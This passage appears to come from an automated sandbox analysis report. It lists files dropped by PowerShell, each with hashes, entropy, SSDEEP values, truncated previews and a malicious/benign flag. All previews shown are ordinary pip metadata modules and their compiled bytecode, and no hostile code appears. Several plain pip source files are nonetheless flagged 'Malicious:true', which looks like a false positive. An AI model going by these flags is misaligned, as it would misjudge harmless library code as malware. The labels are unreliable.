                                                                                                                                                                                                                              SHA-512:871875419549453BE3B26F119369F2451A7C6B9AF6F772EC196AD1C7DFAE1045D4904478065C1AD4FA5384653C26E8AB8A2AC19FD1CF9EF6D3E62307D208A0F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfC.........................n.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.e.d.e.f.d...Z.d.e.d.e.e.e.f.....f.d...Z.y.)......)...Header..decode_header..make_header)...Message)...Any..Dict..List..Union).).z.Metadata-VersionF)...NameF)...VersionF)...DynamicT)...PlatformT).z.Supported-PlatformT)...SummaryF)...DescriptionF).z.Description-Content-TypeF)...KeywordsF).z.Home-pageF).z.Download-URLF)...AuthorF).z.Author-emailF)...MaintainerF).z.Maintainer-emailF)...LicenseF)...ClassifierT).z.Requires-DistT).z.Requires-PythonF).z.Requires-ExternalT).z.Project-URLT).z.Provides-ExtraT).z.Provides-DistT).z.Obsoletes-DistT..field..returnc.....................B.....|.j...........................j...................d.d.........S.).N..-.._)...lower..replace).r....s.... .MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/metadata/_json.py..json_namer....%...s..........;.;.=.. .. ...c..*..*.......msgc...........................d.t.........t.........t.........f.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35694
                                                                                                                                                                                                                              Entropy (8bit):5.389103247749461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:ibWEWQgAaUKs9GYU9UunejwQHCoDXMjLk6cVOZiqZyWWXPq5zh7QyPuAV0hDHA7W:OgAEejwQHCbjLk62OZiqVWXSxhN6h8W
                                                                                                                                                                                                                              MD5:D395784AE9692A5950910130C69BDBDD
                                                                                                                                                                                                                              SHA1:07B6C7B42788FC5D3FA7AF79ED8FD0DC3612EBB8
                                                                                                                                                                                                                              SHA-256:87C5A50C226326CB9172A9E0DE901BB2D0E539BCF234B0137BF964C12C445AF6
                                                                                                                                                                                                                              SHA-512:A5E5F16A9A65A78842196C387E27BE5F7692E1498EEA5C0C92CDF7AD5076E31C80B1168D1A13A7334739BA4B96836B3C2BE8B5579DDDA5912483C5C20C9F6447
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf3e........................V.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(m)Z)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5..e.r.d.d.l.m6Z6..n.e7Z6e.e e!f.....Z8e.e9e.jt..................f.....Z;..e.jx..................e=........Z>..G.d...d.e6........Z?d.e.e9d.f.....d.e.e9d.f.....d.e9f.d...Z@..G.d...d.e.........ZA..G.d...d.e6........ZB..G.d...d.........ZC..G.d...d.e6........ZD..G.d ..d!eD........ZE..G.d"..d#eD........ZFy.)$.....N)...IO..TYPE_CHECKING..Any..Collection..Container..Dict..Iterable..Iterator..List..NamedTuple..Optional..Tuple..Union)...Requirement)...InvalidSpecifier..SpecifierSet)...NormalizedName..canonicalize_name)...LegacyVersion..Version)...NoneMetadataError)...site_packages..user_site)...DIRECT_URL_METADATA_NAME..DirectUrl..DirectUrlValidationError)...stdli
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15772
                                                                                                                                                                                                                              Entropy (8bit):5.197307756593286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:uokrNgL411P7zPfMwCPcaaUiIXzKo3+b+ESaZGyjty9Z/aodjAKxqc:MBgLEP7z3Mw7NyKbeyjty9dHrxqc
                                                                                                                                                                                                                              MD5:569892A53479F95C81DC1E20E8EAA6F8
                                                                                                                                                                                                                              SHA1:78F7A126814E89D8ED6C72E2DA5E9682A488080F
                                                                                                                                                                                                                              SHA-256:54D16A3384AA9DA7A1720C2B64ACD1AEE08C54CF65F30C5575BFE434BD90260A
                                                                                                                                                                                                                              SHA-512:215FEE1DEC9EB380658A959D9FFF748D1D96CBEBAA66011C965E8DD174C4F94FC50BF2CADEC43514B1CF5495E71F68F63BF0C9FC82B820FC2A99D1EEBD8DB18A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf3'........................j.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z ..d.d.l!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*..g.d...Z+..e.jX..................e-........Z.d.Z/..G.d...d.e.........Z0..G.d...d.........Z1..G.d...d.e%........Z2..G.d...d.e'........Z3y.)......N)...Collection..Iterable..Iterator..List..Mapping..NamedTuple..Optional)...pkg_resources)...Requirement)...NormalizedName..canonicalize_name)...parse)...InvalidWheel..NoneMetadataError..UnsupportedWheel)...egg_link_path_from_location)...display_path..normalize_path)...parse_wheel..read_wheel_metadata_file.....)...BaseDistribution..BaseEntryPoint..BaseEnvironment..DistributionVersion..InfoPath..Wheel)...NAME..Distribution..Environmentr....c.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y.)...EntryPoint..name..value..groupN)...__name__..__module__..__qualname__..s
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2627
                                                                                                                                                                                                                              Entropy (8bit):4.480026694538661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:abXOHAkkJ29i/bARRoJ6p/GUKnPF4VZgyRfeg+q9waXmPy8qQjzaFF3TFFot:OXsAnJ2E/6RoJ6p/JiPyAYD+qwaXejqE
                                                                                                                                                                                                                              MD5:55D212D8C700DDEB044012375AD7B560
                                                                                                                                                                                                                              SHA1:F2089D3ECDFA459D011D166251904B1AF6CA3964
                                                                                                                                                                                                                              SHA-256:473E4CE5C89236F213C1A4D047A35F37C4E02A033959F4F0B380FA085927A2F1
                                                                                                                                                                                                                              SHA-512:DE07561329CD8D733A02DEEFC707467867D3EBABD945CEDDCF642CEF32F29823C47393545BD9F8745CA44BB0764F4C085EC0122B6652DFC55685F0F5E8B67A9F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# Extracted from https://github.com/pfmoore/pkg_metadata..from email.header import Header, decode_header, make_header.from email.message import Message.from typing import Any, Dict, List, Union..METADATA_FIELDS = [. # Name, Multiple-Use. ("Metadata-Version", False),. ("Name", False),. ("Version", False),. ("Dynamic", True),. ("Platform", True),. ("Supported-Platform", True),. ("Summary", False),. ("Description", False),. ("Description-Content-Type", False),. ("Keywords", False),. ("Home-page", False),. ("Download-URL", False),. ("Author", False),. ("Author-email", False),. ("Maintainer", False),. ("Maintainer-email", False),. ("License", False),. ("Classifier", True),. ("Requires-Dist", True),. ("Requires-Python", False),. ("Requires-External", True),. ("Project-URL", True),. ("Provides-Extra", True),. ("Provides-Dist", True),. ("Obsoletes-Dist", True),.]...def json_name(field: str) -> str:. return field.l
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25907
                                                                                                                                                                                                                              Entropy (8bit):4.510742658726637
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:b+/p4A7xsYUPhrlPigLnaT5/Q1DX3hTzJxsAT3ZTJXw5uajuH:8BjgbG5YdNz4ATVJXw5uF
                                                                                                                                                                                                                              MD5:C822C339F8E7369CA654DEC33E98034F
                                                                                                                                                                                                                              SHA1:C314E363F75351CB40444ABBB4523097079D3C6A
                                                                                                                                                                                                                              SHA-256:9775A092EE31960AFCB38A7A7D2FB7A90E1028EA4F6D62D1C22E5DF68984146E
                                                                                                                                                                                                                              SHA-512:EC1B4C9EF8A9651F7F89E10A444987ABDC40B89397706724BF8F5466C9E3D86C7E9DE74D29DF95B5A20EE29A4E9F5198913C47D9BE380FA30E63B7C1F9DE1894
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import csv.import email.message.import functools.import json.import logging.import pathlib.import re.import zipfile.from typing import (. IO,. TYPE_CHECKING,. Any,. Collection,. Container,. Dict,. Iterable,. Iterator,. List,. NamedTuple,. Optional,. Tuple,. Union,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import InvalidSpecifier, SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import LegacyVersion, Version..from pip._internal.exceptions import NoneMetadataError.from pip._internal.locations import site_packages, user_site.from pip._internal.models.direct_url import (. DIRECT_URL_METADATA_NAME,. DirectUrl,. DirectUrlValidationError,.).from pip._internal.utils.compat import stdlib_pkgs # TODO: Move definition here..from pip._internal.utils.egg_link import egg_link_path_from_sys_path.from pip._internal.utils.mis
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):135
                                                                                                                                                                                                                              Entropy (8bit):4.513944228305531
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1L69SQoWcQNmIFL6uaFMxDdeK6EJJRFo+HrgJDhGQNs2eY3v9MolP:1LmSQzNLlDd1RJADhts2jMi
                                                                                                                                                                                                                              MD5:994B6EDE7339C2D81DF1EC2FCF571A53
                                                                                                                                                                                                                              SHA1:E7447ED9C17DB5DF5A9200DA03C4D0B8812CC185
                                                                                                                                                                                                                              SHA-256:8D4522768C671DC7C84C71DA0161B51B68B97DD058925BFFB89723A36C7B5581
                                                                                                                                                                                                                              SHA-512:91FF6287AB5B1AB4E81D92D30DC0948E6374908AF5B52CDA4B3E7B89CE84D9A81FDAAE9536914AFBDF9B69EE407425FDD458063B162BD55CE4883E152E43340A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from ._dists import Distribution.from ._envs import Environment..__all__ = ["NAME", "Distribution", "Environment"]..NAME = "importlib".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                              Entropy (8bit):5.178471969154494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:dicAYbwEBX44J9qXTwWegw52KNdAreKAfAb6IagwtVpcln:dKYbzD9qDsSKNnb8jagEcl
                                                                                                                                                                                                                              MD5:BCEAB062F19346BC9955CC49F68B46FF
                                                                                                                                                                                                                              SHA1:CEDA83CFB523F9434A05FBDE97B450CDBDAE6B45
                                                                                                                                                                                                                              SHA-256:E99732EA53C6D7FCE0C7EA0D8C0052BA92DFD56E6B3F0C74B7FA9EC967FB777A
                                                                                                                                                                                                                              SHA-512:DF27E786D9E2726AE5E7CF3C0F56D03500AFAD53159431992535250867FC07AAF90B8AC63065FA43F439A4B98B43DADCAEB714F14590548E763F8FBAFB5862C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................(.....d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z.y.)......)...Distribution)...Environment)...NAMEr....r......importlibN)..._distsr......_envsr......__all__r............ZC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/metadata/importlib/__init__.py..<module>r........s........... .....1.......r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3315
                                                                                                                                                                                                                              Entropy (8bit):5.176086082215194
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4fnN51hGSxxn7NKTE+JGuDhv2qDrd65v18Pj:4fnN51hl352LDhv2Ge1Yj
                                                                                                                                                                                                                              MD5:94B79B9F9F403EE329A9232A806124B0
                                                                                                                                                                                                                              SHA1:0B2B90C8C09B66481AEE317645ACF19E58D10D02
                                                                                                                                                                                                                              SHA-256:46BD5569A73CAF535B26BCAE536CF2A9F6F01279B627D6F996221D8C6B77332C
                                                                                                                                                                                                                              SHA-512:C93B7A83124125BCCCE7B37A82A0F1E774BE2F698BDC90C07A7A054795040E6BE2A0A01653BC2CF0B9BC9BB1C07575CE9A7EC1AA06D5BF8EDD61F0FE7176832B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfZ...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z.d.e.j...................j...................d.e.e.....f.d...Z.d.e.j...................j...................d.e.f.d...Z.y.)......N)...Any..Optional..Protocol..castc.....................T.....e.Z.d.Z.d.e.j...................j...................d.e.d.d.f.d...Z.d.e.f.d...Z.y.)...BadMetadata..dist..reason..returnNc..................... .....|.|._.........|.|._.........y...N..r....r....)...selfr....r....s.... .YC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/metadata/importlib/_compat.py..__init__z.BadMetadata.__init__....s.........................c.....................<.....d.|.j.....................d.|.j.....................d...S.).Nz.Bad metadata in z. (..)r......r....s.... r......__str__z.BadMetadata.__str__....s........!.$.).)...B.t.{.{.m.1..=..=r....)...__name__..__module__..__qualname__..importlib..metadata..Distribution..strr....r......r....r....r....r.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13407
                                                                                                                                                                                                                              Entropy (8bit):5.225343634413829
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/kxKo5FXozajvUwHJwPrWst6rSVyfVL+lm54+3ushCj91Ve478:/kwIF8aok+PrWKApVSm5dnhCj91wI8
                                                                                                                                                                                                                              MD5:A916277EEDAB03654114337D66F3055E
                                                                                                                                                                                                                              SHA1:3BEE64A3060B0A67E1A76C7DA2507ED570540E60
                                                                                                                                                                                                                              SHA-256:2F06D5ED0103A5F97B92D9D47490EEF0C0F226CC9A9B5349AB7F501CBA81A550
                                                                                                                                                                                                                              SHA-512:DE08B42D3D4F5477308A68B50EFFE17818BA5F990E1CFF78CEE5ADBCF1C3D049268337EF76F59C56D6F352F7A3C714CF56160A0D9AAF7CEFCFA798F391D3FC4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfi ........................4.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&m'Z'..d.d.l(m)Z)m*Z*....G.d...d.e.jV..................jX..........................Z-..G.d...d.e.........Z,y.)......N)...Collection..Dict..Iterable..Iterator..Mapping..Optional..Sequence..cast)...Requirement)...NormalizedName..canonicalize_name)...parse)...InvalidWheel..UnsupportedWheel)...BaseDistribution..BaseEntryPoint..DistributionVersion..InfoPath..Wheel)...normalize_path)...TempDirectory)...parse_wheel..read_wheel_metadata_file.....)...BasePath..get_dist_namec...........................e.Z.d.Z.d.Z.d.e.e.j...................e.f.....d.e.j...................d.d.f.d...Z.e.d.e.j...................d.e.d.e.d.d.f.d...........Z.d.e.d.e.e.j.......................f.d...Z.d.e.d.e.e.....f.d...Z.y.)...WheelDistributiona....An ``importlib.metadata.Distributi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11162
                                                                                                                                                                                                                              Entropy (8bit):5.45768626060598
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:jYRthrHS4ArSYer719Rzhp0AArfoQpe3bKaHvc5wy1MO9H8xtxk2y2sCLA3vs:jz4YYhDzhp5ArANrKaP5IMO9H8xHzcCB
                                                                                                                                                                                                                              MD5:35ADFDA2E70E11C1E5D591D61A1148B6
                                                                                                                                                                                                                              SHA1:B7D2E6595E3E254CEF8D80993776A6546CE0FA2A
                                                                                                                                                                                                                              SHA-256:49D7052D9DF52099DC8C7861D8ED0001DC5CCD8F15907B2BD135A667391A491C
                                                                                                                                                                                                                              SHA-512:C7E90BF9E0BD6ABFC6652BBA68CB029771AD540BEAD0D85971E0F27D9B153FBC5CC5266177A9F81498666A70E3FAD8101133E8094A97B90EFB54D581B615ECAE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf .........................l.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m Z ..d.d.l!m"Z"....e.jF..................e$........Z%d.e&d.e'f.d...Z(..G.d...d.........Z)..e.jT..................d...........d.e.e&....d.d.f.d...........Z+..G.d...d.e.........Z,y.)......N)...Iterator..List..Optional..Sequence..Set..Tuple)...NormalizedName..canonicalize_name)...BaseDistribution..BaseEnvironment)...Wheel....deprecated)...WHEEL_EXTENSION.....)...BadMetadata..BasePath..get_dist_name..get_info_location)...Distribution..location..returnc...........................|.j...................t.................s.y.t.........j...................j...................|.........s.y.t.........j...................j...................t.........j...................j...................|.................s.y.t.........j...................|.........S.).NF)...endswithr.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1882
                                                                                                                                                                                                                              Entropy (8bit):4.602899198329515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Vu5TvCOOJGAx1Mzc2qwgrdi87bF/6S118ZsCEmn:VuZeJGuwc2qDrdhX5v1gamn
                                                                                                                                                                                                                              MD5:868E0CB17D54C2243F5F83B20268B8CB
                                                                                                                                                                                                                              SHA1:C14B0C6281F758B43FB481B2E0AEFDB447A07E54
                                                                                                                                                                                                                              SHA-256:1807BFA6B21F084E2253296B9EBFF67494659240554546CE89D128203ECB3E81
                                                                                                                                                                                                                              SHA-512:2FDE33A9380FE437DD64FEDA942A9AA18EF7A16D3FE99B25851A986E7191A2287C1C803B768F1A9D74040F9A9CA81B2EA349029EC558C5500F580F04E81F7522
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import importlib.metadata.from typing import Any, Optional, Protocol, cast...class BadMetadata(ValueError):. def __init__(self, dist: importlib.metadata.Distribution, *, reason: str) -> None:. self.dist = dist. self.reason = reason.. def __str__(self) -> str:. return f"Bad metadata in {self.dist} ({self.reason})"...class BasePath(Protocol):. """A protocol that various path objects conform... This exists because importlib.metadata uses both ``pathlib.Path`` and. ``zipfile.Path``, and we need a common base for type hints (Union does not. work well since ``zipfile.Path`` is too new for our linter setup)... This does not mean to be exhaustive, but only contains things that present. in both classes *that we need*.. """.. @property. def name(self) -> str:. raise NotImplementedError().. @property. def parent(self) -> "BasePath":. raise NotImplementedError()...def get_info_location(d: importlib.metadata.Distribution) ->
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8297
                                                                                                                                                                                                                              Entropy (8bit):4.532947846517071
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:wV/IFzf7wLao/k2oPIU58MrweBGWqD8JklAWaV8s455l6Ow51Y2Zn:wVAJc+o/BorCMrw/AxVzoJw7Ysn
                                                                                                                                                                                                                              MD5:420DDAA2C0D5E2B00A0943680DAED63C
                                                                                                                                                                                                                              SHA1:FBFC2FC17E02A9C351968789E159C4AAD2AC5EB9
                                                                                                                                                                                                                              SHA-256:50F975C14BA316A8B08A5B51275B4C178D9644834ED6C4A934D958436997D269
                                                                                                                                                                                                                              SHA-512:30415907241FA13E17FD81E8E4F174DEF734B8F38C6B0BB97B7E0483EF04D6EA573B63E2B4DBAEBBA729645CFAA5DB8BB9CFDBA960FAD80F636547ED2551A40C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import email.message.import importlib.metadata.import os.import pathlib.import zipfile.from typing import (. Collection,. Dict,. Iterable,. Iterator,. Mapping,. Optional,. Sequence,. cast,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.exceptions import InvalidWheel, UnsupportedWheel.from pip._internal.metadata.base import (. BaseDistribution,. BaseEntryPoint,. DistributionVersion,. InfoPath,. Wheel,.).from pip._internal.utils.misc import normalize_path.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.wheel import parse_wheel, read_wheel_metadata_file..from ._compat import BasePath, get_dist_name...class WheelDistribution(importlib.metadata.Distribution):. """An ``importlib.metadata.Distribution`` read from a wheel... Although ``importlib.m
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7456
                                                                                                                                                                                                                              Entropy (8bit):4.438434499132661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:oL4LS4ArV0a94hpVLTUKNBo4XxcnXLBWa:o94c4hpVLYKNK+4Bz
                                                                                                                                                                                                                              MD5:DEB78E4A0BC1E78858B6836A8697F58D
                                                                                                                                                                                                                              SHA1:02DA419A727D5C6BAC5CCFEB9FA2B6EC90929E0C
                                                                                                                                                                                                                              SHA-256:5D36852181113F6245D10519B8FC761138AE8176CF11C67CABC64A7A1B7A2E97
                                                                                                                                                                                                                              SHA-512:C251C5236F859AFBAD12C563F796E469CB10E20ECED6908F02806FB3F10DF994769DA27CA4AC68F0D423C485938141D1B39A9BD336B9D4AA66A40C9390860844
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import functools.import importlib.metadata.import logging.import os.import pathlib.import sys.import zipfile.import zipimport.from typing import Iterator, List, Optional, Sequence, Set, Tuple..from pip._vendor.packaging.utils import NormalizedName, canonicalize_name..from pip._internal.metadata.base import BaseDistribution, BaseEnvironment.from pip._internal.models.wheel import Wheel.from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import WHEEL_EXTENSION..from ._compat import BadMetadata, BasePath, get_dist_name, get_info_location.from ._dists import Distribution..logger = logging.getLogger(__name__)...def _looks_like_wheel(location: str) -> bool:. if not location.endswith(WHEEL_EXTENSION):. return False. if not os.path.isfile(location):. return False. if not Wheel.wheel_file_re.match(os.path.basename(location)):. return False. return zipfile.is_zipfile(location)...class _DistributionFinder:. """Finder to loca
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10035
                                                                                                                                                                                                                              Entropy (8bit):4.503412051370959
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:wtr9aOs71L0KaDjLPddsa5Il5xNIWTbBpb373WX/FxY5of:wtBaO0AH7EFTH3UxYG
                                                                                                                                                                                                                              MD5:897E459520E104211FC347EA05C760CF
                                                                                                                                                                                                                              SHA1:2C5FD18665771B95A89E6C14EBE587FF3A5B4B93
                                                                                                                                                                                                                              SHA-256:A298F0E08052A87BE27BAB1727F71B4F8DA67B28283C451F354449B96658EEC9
                                                                                                                                                                                                                              SHA-512:2837EAFFD82F35A9DD8A5478D00E472E8E496AB8B17FE5141FFB155558652216EB1FC770C0CD17307F32F3800AAFD0DF399C4DB7E78C89A05DACD653D6C77E96
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import email.message.import email.parser.import logging.import os.import zipfile.from typing import Collection, Iterable, Iterator, List, Mapping, NamedTuple, Optional..from pip._vendor import pkg_resources.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.exceptions import InvalidWheel, NoneMetadataError, UnsupportedWheel.from pip._internal.utils.egg_link import egg_link_path_from_location.from pip._internal.utils.misc import display_path, normalize_path.from pip._internal.utils.wheel import parse_wheel, read_wheel_metadata_file..from .base import (. BaseDistribution,. BaseEntryPoint,. BaseEnvironment,. DistributionVersion,. InfoPath,. Wheel,.)..__all__ = ["NAME", "Distribution", "Environment"]..logger = logging.getLogger(__name__)..NAME = "pkg_resources"...class EntryPoint(NamedTuple):. name: str.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):63
                                                                                                                                                                                                                              Entropy (8bit):4.022085131599381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:sJlRFQviFIaqtPjuqOfv:s7+CoJOfv
                                                                                                                                                                                                                              MD5:F4122DF11215E5CC0F203F0C4B9238E9
                                                                                                                                                                                                                              SHA1:AF1B34A8655A6A39832635A34DCBC060412ED6CB
                                                                                                                                                                                                                              SHA-256:DC31D477FAB1A4FA337F3A2EA2A6BD83DB6CD42CEBE6A6877C5C5B9F1AE27A93
                                                                                                                                                                                                                              SHA-512:C836375798F4D4BAB31E84974C93F930B7975DD126E0A6AEB4239D32D74985D091FD82EC7F9260167F243C3FF27B513681E623D74830489DEEBC20CEE9A3C3AB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""A package that contains models that represent entities..""".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):5.025049303562387
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:EOtaCCyc+CoJOh/Z6B0WltUw52KNdAreKAjQ6IaYleHXlll:EaaCCwCou6BvP+KNnbjQjaYkH1ll
                                                                                                                                                                                                                              MD5:3405A03E2066C25D2E6E4A1752084AA5
                                                                                                                                                                                                                              SHA1:43F5C98DBFB685ED308FE35E20E29B1433646C47
                                                                                                                                                                                                                              SHA-256:DCD8148C3777A1F3298FE2DE563AF3F424AE02AB72847FEB818C9466044060A9
                                                                                                                                                                                                                              SHA-512:7C53505883A1545649BACE567D7292A3EAF7916C64303DE055CD1C8ECFDADBDEC72420EE2EDABCC8212CD6D97BC9B9360AB1F2FFBDA9160D4F4638E1860702EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf?...............................d.Z.y.).z8A package that contains models that represent entities..N)...__doc__........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1887
                                                                                                                                                                                                                              Entropy (8bit):5.130833570290975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:njxagUy0rnSEddyfGqfIwbXk0rw/z0rlNVk0riKaw8G0rUAqg6STqxtX+k:jxa3SYdy+s5bXF5lNVFTJ8TUQ6STqLV
